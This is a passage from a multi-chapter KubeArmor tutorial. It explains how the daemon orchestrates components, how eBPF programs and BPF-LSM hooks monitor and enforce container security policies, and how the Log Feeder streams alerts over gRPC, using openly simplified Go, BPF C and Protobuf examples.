&dm.Node, &dm.NodeLock, // Node info
dm.Logger, // Reference to the logger
&dm.Containers, &dm.ContainersLock, // Container identity info
&dm.ActiveHostPidMap, &dm.ActivePidMapLock, // Host process identity info
&dm.MonitorLock, // Monitor's own lock
)
if dm.SystemMonitor == nil {
return false
}
// Initialize BPF inside the monitor
if err := dm.SystemMonitor.InitBPF(); err != nil {
return false
}
return true
}
// InitRuntimeEnforcer Function (Called by Daemon)
func (dm *KubeArmorDaemon) InitRuntimeEnforcer(pinpath string) bool {
// Create a new RuntimeEnforcer instance, passing it data/references
dm.RuntimeEnforcer = efc.NewRuntimeEnforcer(
dm.Node, // Node info
pinpath, // BPF pin path from the monitor
dm.Logger, // Reference to the logger
dm.SystemMonitor, // Reference to the monitor (for BPF integration needs)
)
return dm.RuntimeEnforcer != nil
}
Explanation:
NewKubeArmorDaemon
is like the constructor; it creates the Daemon object and initializes its basic fields and locks. Pointers to components like Logger
, SystemMonitor
, RuntimeEnforcer
are initially zeroed.
The main KubeArmor()
function then calls dedicated Init...
methods on the dm
object (like dm.InitLogger()
, dm.InitSystemMonitor()
, dm.InitRuntimeEnforcer()
).
These Init...
methods are responsible for creating the actual instances of the other components using their respective New...
functions (e.g., mon.NewSystemMonitor()
) and assigning the returned object to the Daemon's pointer field (dm.SystemMonitor = ...
). They pass necessary configuration and references (like the Logger
) to the components they initialize.
After initializing components, the Daemon starts goroutines (using go dm.SomeFunction()
) for tasks that need to run continuously in the background, like serving logs, monitoring system events, or watching external APIs.
The main flow then typically waits for a shutdown signal (<-sigChan
).
When a signal is received, dm.DestroyKubeArmorDaemon()
is called, which in turn calls Close...
methods on the components to shut them down gracefully.
This demonstrates the Daemon's role in the lifecycle: it's the entity that brings the other parts to life, wires them together by passing references, starts their operations, and orchestrates their shutdown.
The Daemon isn't just starting components; it's managing the flow of information:
Policies In: The Daemon actively watches the Kubernetes API (or receives updates in non-K8s mode) for changes to KubeArmor policies. When it gets a policy, it stores it in its SecurityPolicies
or HostSecurityPolicies
lists and notifies the Runtime Enforcer to update the kernel rules for affected workloads.
Identity Management: The Daemon watches Pod/Container/Node events from Kubernetes and the container runtime. It populates internal structures (like the Containers
map) which are then used by the System Monitor to correlate raw kernel events with workload identity (Container/Node Identity). While the NsMap
itself might live in the Monitor (as seen in Chapter 4 context), the Daemon is responsible for gathering the initial K8s/CRI data needed to populate that map.
Events Up: The System Monitor constantly reads raw event data from the kernel (via BPF ring buffer). It performs the initial lookup using the Namespace IDs and passes the enriched events (likely via Go channels, as hinted in Chapter 4 code) back to the Daemon or a component managed by the Daemon (like the logging pipeline within the Feeder).
Logs Out: The Daemon (or its logging pipeline) takes these enriched events and passes them to the Log Feeder component. The Log Feeder is then responsible for sending these logs/alerts to the configured output destinations.
The Daemon acts as the central switchboard, ensuring that policies are delivered to the enforcement layer, that kernel events are enriched with workload context, and that meaningful security logs and alerts are generated and sent out.
Component Management
Starts, stops, and manages the lifecycle of Monitor, Enforcer, Logger.
System Monitor, Runtime Enforcer, Log Feeder
External Comm.
Watches K8s API for policies & workload info; interacts with CRI.
Kubernetes API Server, Container Runtimes (Docker, containerd, CRI-O)
Identity Building
Gathers data (Labels, Namespaces, Container IDs, PIDs, NS IDs) to map low-level events to workloads.
Kubernetes API Server, Container Runtimes, OS Kernel (/proc
)
Policy Processing
Fetches policies, identifies targeted workloads on its node.
Kubernetes API Server, Internal state (Identity)
Enforcement Orchest.
Tells the Runtime Enforcer which policies to load for which workload.
Runtime Enforcer, Internal state (Identity, Policies)
Event Reception
Receives raw or partially processed events from the Monitor.
System Monitor (via channels/buffers)
Event Enrichment
Adds full workload identity and policy context to incoming events.
System Monitor, Internal state (Identity, Policies)
Logging/Alerting
Formats events into structured logs/alerts and passes them to the Log Feeder.
Log Feeder, Internal state (Enriched Events)
Configuration/Signal
Reads configuration, handles graceful shutdown requests.
Configuration files/API, OS Signals
This table reinforces that the Daemon is the crucial integration layer on each node.
In this chapter, you learned that the KubeArmor Daemon is the core process running on each node, serving as the central orchestrator for all other KubeArmor components. It's responsible for initializing, managing, and coordinating the System Monitor (eyes/ears), Runtime Enforcer (security guard), and Log Feeder (reporter). You saw how it interacts with Kubernetes and container runtimes to understand Container/Node Identity and fetch Security Policies, bringing all the pieces together to enforce your security posture and report violations.
Understanding the Daemon's central role is key to seeing how KubeArmor operates as a cohesive system on each node. In the final chapter, we'll focus on where all the security events observed by the Daemon and its components end up
Welcome back to the KubeArmor tutorial! In the previous chapter, we explored the System Monitor, KubeArmor's eyes and ears inside the operating system, responsible for observing runtime events like file accesses, process executions, and network connections. We learned that the System Monitor uses a powerful kernel technology called eBPF to achieve this deep visibility with low overhead.
In this chapter, we'll take a closer look at BPF (Extended Berkeley Packet Filter), or eBPF as it's more commonly known today. This technology isn't just used by the System Monitor; it's also a key enforcer type available to the Runtime Enforcer component in the form of BPF-LSM. Understanding eBPF is crucial to appreciating how KubeArmor works at a fundamental level within the Linux kernel.
Imagine the Linux kernel as the central operating system managing everything on your computer or server. Traditionally, if you wanted to add new monitoring, security, or networking features deep inside the kernel, you had to write C code, compile it as a kernel module, and load it. This is risky because bugs in kernel modules can crash the entire system.
eBPF provides a safer, more flexible way to extend kernel functionality. Think of it as a miniature, highly efficient virtual machine running inside the kernel. It allows you to write small programs that can be loaded into the kernel and attached to specific "hooks" (points where interesting events happen).
Here's the magic:
Safe: eBPF programs are verified by a kernel component called the "verifier" before they are loaded. The verifier ensures the program won't crash the kernel, hang, or access unauthorized memory.
Performant: eBPF programs run directly in the kernel's execution context when an event hits their hook. They are compiled into native machine code for the processor using a "Just-In-Time" (JIT) compiler, making them very fast.
Flexible: They can be attached to various hooks for monitoring or enforcement, including system calls, network events, tracepoints, and even Linux Security Module (LSM) hooks.
Data Sharing: eBPF programs can interact with user-space programs (like the KubeArmor Daemon) and other eBPF programs using shared data structures called BPF Maps.
KubeArmor needs to operate deep within the operating system to provide effective runtime security for containers and nodes. It needs to:
See Everything: Monitor low-level system calls and kernel events across different container namespaces (Container/Node Identity).
Act Decisively: Enforce security policies by blocking forbidden actions before they can harm the system.
Do it Efficiently: Minimize the performance impact on your applications.
eBPF is the perfect technology for this:
Deep Visibility: By attaching eBPF programs to kernel hooks, KubeArmor's System Monitor gets high-fidelity data about system activities as they happen.
High-Performance Enforcement: When used as a Runtime Enforcer via BPF-LSM, eBPF programs can quickly check policies against events directly within the kernel, blocking actions instantly without the need to switch back and forth between kernel and user space for every decision.
Low Overhead: eBPF's efficiency means it adds minimal latency to system calls compared to older kernel security mechanisms or relying purely on user-space monitoring.
Kernel Safety: KubeArmor can extend kernel behavior for security without the risks associated with traditional kernel modules.
Let's look at how BPF powers both sides of KubeArmor's runtime protection:
As we saw in Chapter 4, the System Monitor observes events. This is primarily done using eBPF.
How it works: Small eBPF programs are attached to kernel hooks related to file, process, network, etc., events. When an event triggers a hook, the eBPF program runs. It collects relevant data (like the path, process ID, Namespace IDs) and writes this data into a special shared memory area called a BPF Ring Buffer.
Getting Data to KubeArmor: The KubeArmor Daemon (KubeArmor Daemon) in user space continuously reads events from this BPF Ring Buffer.
Context: The daemon uses the Namespace IDs from the event data to correlate it with the specific container or node (Container/Node Identity) before processing and sending the alert via the Log Feeder.
Simplified view of monitoring data flow:
This shows the efficient flow: the kernel triggers a BPF program, which quickly logs data to a buffer that KubeArmor reads asynchronously.
Let's revisit a simplified code concept for the BPF monitoring program side (C code compiled to BPF):
// Simplified BPF C code for monitoring (part of system_monitor.c)
struct event {
u64 ts;
u32 pid_id; // PID Namespace ID
u32 mnt_id; // Mount Namespace ID
u32 event_id; // Type of event
char comm[16]; // Process name
char path[256]; // File path or network info
};
// Define a BPF map of type RINGBUF for sending events to user space
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 1 << 24);
} kubearmor_events SEC(".maps"); // This name is referenced in Go code
SEC("kprobe/sys_enter_openat") // Attach to the openat syscall entry
int kprobe__sys_enter_openat(struct pt_regs *ctx) {
struct event *task_info;
// Reserve space in the ring buffer
task_info = bpf_ringbuf_reserve(&kubearmor_events, sizeof(*task_info), 0);
if (!task_info)
return 0; // Could not reserve space, drop event
// Populate the event data
task_info->ts = bpf_ktime_get_ns();
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
task_info->pid_id = get_task_pid_ns_id(task); // Helper to get NS ID
task_info->mnt_id = get_task_mnt_ns_id(task); // Helper to get NS ID
task_info->event_id = 1; // Example: 1 for file open
bpf_get_current_comm(&task_info->comm, sizeof(task_info->comm));
// Get path argument (simplified greatly)
// Note: Real BPF code needs careful handling of user space pointers
const char *pathname = (const char *)PT_REGS_PARM2(ctx);
bpf_probe_read_str(task_info->path, sizeof(task_info->path), pathname);
// Submit the event to the ring buffer
bpf_ringbuf_submit(task_info, 0);
return 0;
}
Explanation:
struct event
: Defines the structure of the data sent for each event.
kubearmor_events
: Defines a BPF map of type RINGBUF
. This is the channel for kernel -> user space communication.
SEC("kprobe/sys_enter_openat")
: Specifies where this program attaches - at the entry of the openat
system call.
bpf_ringbuf_reserve
: Allocates space in the ring buffer for a new event.
bpf_ktime_get_ns
, bpf_get_current_task
, bpf_get_current_comm
, bpf_probe_read_str
: BPF helper functions used to get data from the kernel context (timestamp, task info, command name, string from user space).
bpf_ringbuf_submit
: Sends the prepared event data to the ring buffer.
On the Go side, KubeArmor's System Monitor uses the cilium/ebpf
library to load this BPF object file and read from the kubearmor_events
map (the ring buffer).
// Simplified Go code for reading BPF events (part of systemMonitor.go)
// systemMonitor Structure (relevant parts)
type SystemMonitor struct {
// ... other fields ...
SyscallPerfMap *perf.Reader // Represents the connection to the ring buffer
// ... other fields ...
}
// Function to load BPF objects and start reading
func (mon *SystemMonitor) StartBPFMonitoring() error {
// Load the compiled BPF code (.o file)
objs := &monitorObjects{} // monitorObjects corresponds to maps and programs in the BPF .o file
if err := loadMonitorObjects(objs, nil); err != nil {
return fmt.Errorf("failed to load BPF objects: %w", err)
}
// mon.bpfObjects = objs // Store loaded objects (simplified)
// Open the BPF ring buffer map for reading
// "kubearmor_events" matches the map name in the BPF C code
rd, err := perf.NewReader(objs.KubearmorEvents, os.Getpagesize())
if err != nil {
objs.Close() // Clean up loaded objects
return fmt.Errorf("failed to create BPF ring buffer reader: %w", err)
}
mon.SyscallPerfMap = rd // Store the reader
// Start a goroutine to read events from the buffer
go mon.readEvents()
// ... Attach BPF programs to hooks (simplified out) ...
return nil
}
// Goroutine function to read events
func (mon *SystemMonitor) readEvents() {
for {
record, err := mon.SyscallPerfMap.Read() // Read a raw event from the kernel
if err != nil {
// ... error handling, check if reader was closed ...
return
}
// Process the raw event data (parse bytes, add context)
// As shown in Chapter 4 context:
// dataBuff := bytes.NewBuffer(record.RawSample)
// ctx, err := readContextFromBuff(dataBuff) // Parses struct event
// ... lookup containerID using ctx.PidID, ctx.MntID ...
// ... format and send event for logging ...
}
}
Explanation:
loadMonitorObjects
: Loads the compiled BPF program and map definitions from the .o
file.
perf.NewReader(objs.KubearmorEvents, ...)
: Opens a reader for the specific BPF map named kubearmor_events
defined in the BPF code. This map is configured as a ring buffer.
mon.SyscallPerfMap.Read()
: Blocks until an event is available in the ring buffer, then reads the raw bytes sent by the BPF program.
The rest of the readEvents
function (simplified out, but hinted at in Chapter 4 context) involves parsing these bytes back into a struct, looking up the container/node identity, and processing the event.
This demonstrates how BPF allows a low-overhead kernel component (the BPF program writing to the ring buffer) and a user-space component (KubeArmor Daemon reading from the buffer) to communicate efficiently.
When KubeArmor is configured to use the BPF-LSM Runtime Enforcer, BPF programs are used not just for monitoring, but for making enforcement decisions in the kernel.
How it works: BPF programs are attached to Linux Security Module (LSM) hooks. These hooks are specifically designed points in the kernel where security decisions are made (e.g., before a file is opened, before a program is executed, before a capability is used).
Policy Rules in BPF Maps: KubeArmor translates its Security Policies into a format optimized for quick lookup and stores these rules in BPF Maps. There might be nested maps where an outer map is keyed by Namespace IDs (Container/Node Identity) and inner maps store rules specific to paths, processes, etc., for that workload.
Decision Making: When an event triggers a BPF-LSM hook, the attached eBPF program runs. It uses the current process's Namespace IDs to look up the relevant policy rules in the BPF maps. Based on the rule found (or the default posture if no specific rule matches), the BPF program returns a value to the kernel indicating whether the action should be allowed (0) or blocked (-EPERM
, which is kernel speak for "Permission denied").
Event Reporting: Even when an action is blocked, the BPF-LSM program (or a separate monitoring BPF program) will often still send an event to the ring buffer so KubeArmor can log the blocked attempt.
Simplified view of BPF-LSM enforcement flow:
This diagram shows the pre-configuration step (KubeArmor loading the program and rules) and then the fast, kernel-internal decision path when an event occurs.
Let's revisit a simplified BPF C code concept for enforcement (part of enforcer.bpf.c):
// Simplified BPF C code for enforcement (part of enforcer.bpf.c)
// Outer map: PidNS+MntNS -> reference to inner map (simplified to u32 for demo)
struct outer_key {
u32 pid_ns;
u32 mnt_ns;
};
struct {
__uint(type, BPF_MAP_TYPE_HASH_OF_MAPS); // Or HASH, simplified
__uint(max_entries, 256);
__type(key, struct outer_key);
__type(value, u32); // In reality, this points to an inner map
__uint(pinning, LIBBPF_PIN_BY_NAME);
} kubearmor_containers SEC(".maps"); // Matches map name in Go code
// Inner map (concept): Path -> Rule
struct data_t {
u8 processmask; // Flags like RULE_EXEC, RULE_DENY
};
// Inner maps are created/managed by KubeArmor in user space
SEC("lsm/bprm_check_security") // Attach to LSM hook for program execution
int BPF_PROG(enforce_proc, struct linux_binprm *bprm, int ret) {
struct task_struct *t = (struct task_struct *)bpf_get_current_task();
struct outer_key okey;
get_outer_key(&okey, t); // Helper to get PidNS+MntNS
// Look up the container's rules map using Namespace IDs
u32 *inner_map_fd = bpf_map_lookup_elem(&kubearmor_containers, &okey);
if (!inner_map_fd) {
return ret; // No rules for this container, allow by default
}
// Get the program's path (simplified)
struct path f_path = BPF_CORE_READ(bprm->file, f_path);
char path[256];
// Simplified path reading logic...
bpf_probe_read_str(path, sizeof(path), /* path pointer */);
// Look up the rule for this path in the inner map (conceptually)
// struct data_t *rule = bpf_map_lookup_elem(inner_map_fd, &path); // Conceptually
struct data_t *rule = /* Simplified: simulate lookup */ NULL; // Replace with actual map lookup
// Decision logic based on rule and event type (BPF_CORE_READ bprm->file access mode)
if (rule && (rule->processmask & RULE_EXEC)) {
if (rule->processmask & RULE_DENY) {
// Match found and action is DENY, block the execution
// Report event (simplified out)
return -EPERM; // Block
}
// Match found and action is ALLOW (or AUDIT), allow execution
// Report event (if AUDIT) (simplified out)
return ret; // Allow
}
// No specific DENY rule matched. Check default posture (simplified)
u32 default_posture = /* Look up default posture in another map */ 0; // 0 for Allow
if (default_posture == BLOCK_POSTURE) {
// Default is BLOCK, block the execution
// Report event (simplified out)
return -EPERM; // Block
}
return ret; // Default is ALLOW or no default, allow
}
Explanation:
struct outer_key
: Defines the key structure for the outer map (kubearmor_containers
), using pid_ns
and mnt_ns
from the process's identity.
kubearmor_containers
: A BPF map storing references to other maps (or rule data directly in simpler cases), allowing rules to be organized per container/namespace.
SEC("lsm/bprm_check_security")
: Attaches this program to the LSM hook that is called before a new program is executed.
BPF_PROG(...)
: Macro defining the BPF program function.
get_outer_key
: Helper function to get the Namespace IDs for the current task.
bpf_map_lookup_elem(&kubearmor_containers, &okey)
: Looks up the map (or data) associated with the current process's namespace IDs.
The core logic involves reading event data (like the program path), looking up the corresponding rule in the BPF maps, and returning 0
to allow or -EPERM
to block, based on the rule's action
flag (RULE_DENY
).
Events are also reported to the ring buffer (kubearmor_events
) for logging, similar to the monitoring path.
On the Go side, the BPF-LSM Runtime Enforcer component loads these programs and, crucially, populates the BPF Maps with the translated policies.
// Simplified Go code for loading BPF enforcement objects and populating maps (part of bpflsm/enforcer.go)
type BPFEnforcer struct {
// ... other fields ...
objs enforcerObjects // Holds loaded BPF programs and maps
// ... other fields ...
}
// NewBPFEnforcer Function (simplified)
func NewBPFEnforcer(...) (*BPFEnforcer, error) {
be := &BPFEnforcer{}
// Load the compiled BPF code (.o file) containing programs and map definitions
objs := enforcerObjects{} // enforcerObjects corresponds to maps and programs in the BPF .o file
if err := loadEnforcerObjects(&objs, nil); err != nil {
return nil, fmt.Errorf("failed to load BPF objects: %w", err)
}
be.objs = objs // Store loaded objects
// Attach programs to LSM hooks
// The AttachLSM call links the BPF program to the kernel hook
// be.objs.EnforceProc refers to the BPF program defined with SEC("lsm/bprm_check_security")
link, err := link.AttachLSM(link.LSMOptions{Program: objs.EnforceProc})
if err != nil {
objs.Close()
return nil, fmt.Errorf("failed to attach BPF program to LSM hook: %w", err)
}
// be.links = append(be.links, link) // Store link to manage it later (simplified)
// Get references to the BPF maps defined in the C code
// "kubearmor_containers" matches the map name in the BPF C code
be.BPFContainerMap = objs.KubearmorContainers
// ... Attach other programs (file, network, capabilities) ...
// ... Setup ring buffer for alerts (like in monitoring) ...
return be, nil
}
// AddContainerPolicies Function (simplified - conceptual)
func (be *BPFEnforcer) AddContainerPolicies(containerID string, pidns, mntns uint32, policies []tp.SecurityPolicy) error {
// Translate KubeArmor policies (tp.SecurityPolicy) into a format
// suitable for BPF map lookup (e.g., map of paths -> rule flags)
// translatedRules := translatePoliciesToBPFRules(policies)
// Create or get a reference to an inner map for this container (using BPF_MAP_TYPE_HASH_OF_MAPS)
// The key for the outer map is the container's Namespace IDs
outerKey := struct{ PidNS, MntNS uint32 }{pidns, mntns}
// Conceptually:
// innerMap, err := bpf.CreateMap(...) // Create inner map if it doesn't exist
// err = be.BPFContainerMap.Update(outerKey, uint32(innerMap.FD()), ebpf.UpdateAny) // Link outer key to inner map FD
// Populate the inner map with the translated rules
// for path, ruleFlags := range translatedRules {
// ruleData := struct{ ProcessMask, FileMask uint8 }{...} // Map ruleFlags to data_t
// err = innerMap.Update(path, ruleData, ebpf.UpdateAny)
// }
// Simplified Update (directly indicating container exists with rules)
containerMapValue := uint32(1) // Placeholder value
if err := be.BPFContainerMap.Update(outerKey, containerMapValue, ebpf.UpdateAny); err != nil {
return fmt.Errorf("failed to update BPF container map: %w", err)
}
be.Logger.Printf("Loaded BPF-LSM policies for container %s (pidns:%d, mntns:%d)", containerID, pidns, mntns)
return nil
}
Explanation:
loadEnforcerObjects
: Loads the compiled BPF enforcement code.
link.AttachLSM
: Attaches a specific BPF program (objs.EnforceProc
) to a named kernel LSM hook (lsm/bprm_check_security
).
be.BPFContainerMap = objs.KubearmorContainers
: Gets a handle (reference) to the BPF map defined in the C code. This handle allows the Go program to interact with the map in the kernel.
AddContainerPolicies
: This conceptual function shows how KubeArmor translates high-level policies into a kernel-friendly format (e.g., flags like RULE_DENY
, RULE_EXEC
) and uses BPFContainerMap.Update
to populate the maps. The Namespace IDs (pidns
, mntns
) are used as keys to ensure policies are applied to the correct container context.
This illustrates how KubeArmor uses user-space code to set up the BPF environment in the kernel, loading programs and populating maps. Once this is done, the BPF programs handle enforcement decisions directly within the kernel when events occur.
BPF technology involves several key components:
BPF Programs
Small, safe programs written in a C-like language, compiled to BPF bytecode
Kernel
Monitor events, Enforce policies at hooks
BPF Hooks
Specific points in the kernel where BPF programs can be attached
Kernel
Entry/exit of syscalls, tracepoints, LSM hooks
BPF Maps
Efficient key-value data structures for sharing data
Kernel (accessed by both kernel BPF and user space)
Store policy rules, Store event data (ring buffer), Store identity info
BPF Verifier
Kernel component that checks BPF programs for safety before loading
Kernel
Ensures KubeArmor's BPF programs are safe
BPF JIT
Compiles BPF bytecode to native machine code for performance
Kernel
Makes KubeArmor's BPF operations fast
BPF Loader
User-space library/tool to compile C code, load programs/maps into kernel
User Space
KubeArmor Daemon uses cilium/ebpf
library as loader
In this chapter, you've taken a deeper dive into BPF (eBPF), the powerful kernel technology that forms the backbone of KubeArmor's runtime security capabilities. You learned how eBPF enables KubeArmor to run small, safe, high-performance programs inside the kernel for both observing system events (System Monitor) and actively enforcing security policies at low level hooks (Runtime Enforcer via BPF-LSM). You saw how BPF Maps are used to share data and store policy rules efficiently in the kernel.
Understanding BPF highlights KubeArmor's modern, efficient approach to container and node security. In the next chapter, we'll bring together all the components we've discussed by looking at the central orchestrator on each node
Welcome back to the KubeArmor tutorial! In the previous chapters, we've learned how KubeArmor defines security rules using Security Policies, identifies workloads using Container/Node Identity, enforces policies with the Runtime Enforcer, and observes system activity with the System Monitor, all powered by the underlying BPF (eBPF) technology and orchestrated by the KubeArmor Daemon on each node.
We've discussed how KubeArmor can audit or block actions based on policies. But where do you actually see the results of this monitoring and enforcement? How do you know when a policy was violated or when suspicious activity was detected?
This is where the Log Feeder comes in.
Think of the Log Feeder as KubeArmor's reporting and alerting system. Its primary job is to collect all the security-relevant events and telemetry that KubeArmor detects and make them available to you and other systems.
It receives structured information, including:
Security Alerts: Notifications about actions that were audited or blocked because they violated a Security Policy.
System Logs: Telemetry about system activities that KubeArmor is monitoring, even if no specific policy applies (e.g., process executions, file accesses, network connections, depending on visibility settings).
KubeArmor Messages: Internal messages from the KubeArmor Daemon itself (useful for debugging and monitoring KubeArmor's status).
The Log Feeder formats this information into standardized messages (using Protobuf, a language-neutral, platform-neutral, extensible mechanism for serializing structured data) and sends it out over a gRPC interface. gRPC is a high-performance framework for inter-process communication.
This gRPC interface allows various clients to connect to the KubeArmor Daemon on each node and subscribe to streams of these security events in real-time. Tools like karmor log
(part of the KubeArmor client tools) connect to this feeder to display events. External systems like Security Information and Event Management (SIEM) platforms can also integrate by writing clients that understand the KubeArmor gRPC format.
You've deployed KubeArmor and applied policies. Now you need to answer questions like:
Was that attempt to read /etc/passwd
from the web server container actually blocked?
Is any process on my host nodes trying to access sensitive files like /root/.ssh
?
Are my applications spawning unexpected shell processes, even if they aren't explicitly blocked by policy?
Did KubeArmor successfully apply the policies I created?
The Log Feeder provides the answers by giving you a stream of events directly from KubeArmor:
It reports when an action was Blocked by a specific policy, providing details about the workload and the attempted action.
It reports when an action was Audited, showing you potentially suspicious behavior even if it wasn't severe enough to block.
It reports general System Events (logs), giving you visibility into the normal or unusual behavior of processes, file accesses, and network connections on your nodes and within containers.
Without the Log Feeder, KubeArmor would be enforcing policies blindly from a monitoring perspective. You wouldn't have the necessary visibility to understand your security posture, detect attacks (even failed ones), or troubleshoot policy issues.
Use Case Example: You want to see every time someone tries to execute a shell (/bin/sh
, /bin/bash
) inside any of your containers. You might create an Audit Policy for this. The Log Feeder is how you'll receive the notifications for these audited events.
Event Source: The System Monitor observes kernel events (process execution, file access, etc.). It enriches these events with Container/Node Identity and sends them to the KubeArmor Daemon. The Runtime Enforcer also contributes by confirming if an event was blocked or audited by policy.
Reception by Daemon: The KubeArmor Daemon receives these enriched events.
Formatting (by Feeder): The Daemon passes the event data to the Log Feeder component. The Feeder takes the structured event data and converts it into the predefined Protobuf message format (e.g., Alert
or Log
message types defined in protobuf/kubearmor.proto
).
Queueing: The Feeder manages internal queues or channels for different types of messages (Alerts, Logs, general KubeArmor Messages). It puts the newly formatted Protobuf message onto the appropriate queue/channel.
gRPC Server: The Feeder runs a gRPC server on a specific port (default 32767).
Client Subscription: External clients connect to this gRPC port and call specific gRPC methods (like WatchAlerts
or WatchLogs
) to subscribe to event streams.
Event Streaming: When a client subscribes, the Feeder gets a handle to the client's connection. It then continuously reads messages from its internal queues/channels and streams them over the gRPC connection to the connected client.
Here's a simple sequence diagram showing the flow:
This shows how events flow from the kernel, up through the System Monitor and Daemon, are formatted by the Log Feeder, and then streamed out to any connected clients.
The Log Feeder is implemented primarily in KubeArmor/feeder/feeder.go
and KubeArmor/feeder/logServer.go
, using definitions from protobuf/kubearmor.proto
and the generated protobuf/kubearmor_grpc.pb.go
.
First, let's look at the Protobuf message structures. These define the schema for the data that gets sent out.
Referencing protobuf/kubearmor.proto
:
// Simplified Protobuf definition for an Alert message
message Alert {
int64 Timestamp = 1;
string UpdatedTime = 2;
string ClusterName = 3;
string HostName = 4;
string NamespaceName = 5;
Podowner Owner = 31; // Link to PodOwner struct
string PodName = 6;
string Labels = 29;
string ContainerID = 7;
string ContainerName = 8;
string ContainerImage = 24;
// Process details (host/container PIDs, names, UID)
int32 HostPPID = 27;
int32 HostPID = 9;
int32 PPID = 10;
int32 PID = 11;
int32 UID = 12;
string ParentProcessName = 25;
string ProcessName = 26;
// Policy/Enforcement details
string PolicyName = 13;
string Severity = 14;
string Tags = 15; // Comma separated tags from policy
repeated string ATags = 30; // Tags as a list
string Message = 16; // High-level description
string Type = 17; // e.g., MatchedPolicy, MatchedHostPolicy, SystemEvent
string Source = 18; // e.g., /bin/bash
string Operation = 19; // e.g., Process, File, Network
string Resource = 20; // e.g., /etc/passwd, tcp://1.2.3.4:80
string Data = 21; // Additional data if any
string Enforcer = 28; // e.g., BPFLSM, AppArmor, eBPF Monitor
string Action = 22; // e.g., Allow, Audit, Block
string Result = 23; // e.g., Failed, Passed, Error
// Context details
string Cwd = 32; // Current working directory
string TTY = 33; // TTY information
// Throttling info (for alerts)
int32 MaxAlertsPerSec = 34;
int32 DroppingAlertsInterval = 35;
ExecEvent ExecEvent = 36; // Link to ExecEvent struct
// ... other fields
}
// Simplified Protobuf definition for a Log message (similar but fewer policy fields)
message Log {
int64 Timestamp = 1;
string UpdatedTime = 2;
// ... similar identity/process fields as Alert ...
string Type = 13; // e.g., ContainerLog, HostLog
string Source = 14;
string Operation = 15;
string Resource = 16;
string Data = 17;
string Result = 18; // e.g., Success, Failed
string Cwd = 25;
string TTY = 26;
ExecEvent ExecEvent = 27;
}
// Simplified definitions for nested structs
message Podowner {
string Ref = 1;
string Name = 2;
string Namespace = 3;
}
message ExecEvent {
string ExecID = 1;
string ExecutableName = 2;
}
These Protobuf definitions specify the exact structure and data types for the messages KubeArmor will send, ensuring that clients know exactly what data to expect. The .pb.go
and _grpc.pb.go
files are automatically generated from this .proto
file and provide the Go code for serializing/deserializing these messages and implementing the gRPC service.
Now, let's look at the Log Feeder implementation in Go.
Referencing KubeArmor/feeder/feeder.go
:
// NewFeeder Function (Simplified)
func NewFeeder(node *tp.Node, nodeLock **sync.RWMutex) *Feeder {
fd := &Feeder{}
// Initialize data structures to hold connection channels
fd.EventStructs = &EventStructs{
MsgStructs: make(map[string]EventStruct[pb.Message]),
MsgLock: sync.RWMutex{},
AlertStructs: make(map[string]EventStruct[pb.Alert]),
AlertLock: sync.RWMutex{},
LogStructs: make(map[string]EventStruct[pb.Log]),
LogLock: sync.RWMutex{},
}
// Configure and start the gRPC server
fd.Port = fmt.Sprintf(":%s", cfg.GlobalCfg.GRPC) // Get port from config
listener, err := net.Listen("tcp", fd.Port)
if err != nil {
kg.Errf("Failed to listen a port (%s, %s)", fd.Port, err.Error())
return nil // Handle error
}
fd.Listener = listener
// Create the gRPC server instance
logService := &LogService{
QueueSize: 1000, // Define queue size for client channels
Running: &fd.Running,
EventStructs: fd.EventStructs, // Pass the connection store
}
fd.LogServer = grpc.NewServer(/* ... gRPC server options ... */)
// Register the LogService implementation with the gRPC server
pb.RegisterLogServiceServer(fd.LogServer, logService)
// ... other initialization ...
return fd
}
// ServeLogFeeds Function (Called by the Daemon)
func (fd *BaseFeeder) ServeLogFeeds() {
fd.WgServer.Add(1)
defer fd.WgServer.Done()
// This line blocks forever, serving gRPC requests until Listener.Close() is called
if err := fd.LogServer.Serve(fd.Listener); err != nil {
kg.Print("Terminated the gRPC service")
}
}
// PushLog Function (Called by the Daemon/System Monitor)
func (fd *Feeder) PushLog(log tp.Log) {
// ... code to process the incoming internal log struct (tp.Log) ...
// Convert the internal log struct (tp.Log) into the Protobuf Log or Alert struct (pb.Log/pb.Alert)
// This involves mapping fields like ContainerID, ProcessName, Resource, Action, PolicyName etc.
// The logic checks the type and fields to decide if it's an Alert or a general Log
if log.Type == "MatchedPolicy" || log.Type == "MatchedHostPolicy" || log.Type == "SystemEvent" {
// It's a security alert type of event
pbAlert := pb.Alert{}
// Copy fields from internal log struct to pbAlert struct
pbAlert.Timestamp = log.Timestamp
// ... copy other fields like ContainerID, PolicyName, Action, Resource ...
// Broadcast the pbAlert to all connected clients watching alerts
fd.EventStructs.AlertLock.Lock() // Lock for safe concurrent access
defer fd.EventStructs.AlertLock.Unlock()
for uid := range fd.EventStructs.AlertStructs {
select {
case fd.EventStructs.AlertStructs[uid].Broadcast <- &pbAlert: // Send to client's channel
default:
// If the client's channel is full, the message is dropped
kg.Printf("alert channel busy, alert dropped.")
}
}
} else {
// It's a general system log type of event
pbLog := pb.Log{}
// Copy fields from internal log struct to pbLog struct
pbLog.Timestamp = log.Timestamp
// ... copy other fields like ContainerID, ProcessName, Resource ...
// Broadcast the pbLog to all connected clients watching logs
fd.EventStructs.LogLock.Lock() // Lock for safe concurrent access
defer fd.EventStructs.LogLock.Unlock()
for uid := range fd.EventStructs.LogStructs {
select {
case fd.EventStructs.LogStructs[uid].Broadcast <- &pbLog: // Send to client's channel
default:
// If the client's channel is full, the message is dropped
kg.Printf("log channel busy, log dropped.")
}
}
}
}
Explanation:
NewFeeder
: This function, called during Daemon initialization, sets up the data structures (EventStructs
) to manage client connections, creates a network listener for the configured gRPC port, and creates and registers the gRPC server (LogServer
). It passes a reference to EventStructs
and other data to the LogService
implementation.
ServeLogFeeds
: This function is run as a goroutine by the KubeArmor Daemon. It calls LogServer.Serve()
, which makes the gRPC server start listening for incoming client connections and handling gRPC requests.
PushLog
: This method is called by the KubeArmor Daemon (specifically, the part that processes events from the System Monitor) whenever a new security event or log needs to be reported. It takes KubeArmor's internal tp.Log
structure, converts it into the appropriate Protobuf message (pb.Alert
or pb.Log
), and then iterates through all registered client connections (stored in EventStructs
) broadcasting the message to their respective Go channels (Broadcast
). If a client isn't reading fast enough, the message might be dropped due to the channel buffer being full.
Now let's see the client-side handling logic within the Log Feeder's gRPC service implementation.
Referencing KubeArmor/feeder/logServer.go
:
// LogService Struct (Simplified)
type LogService struct {
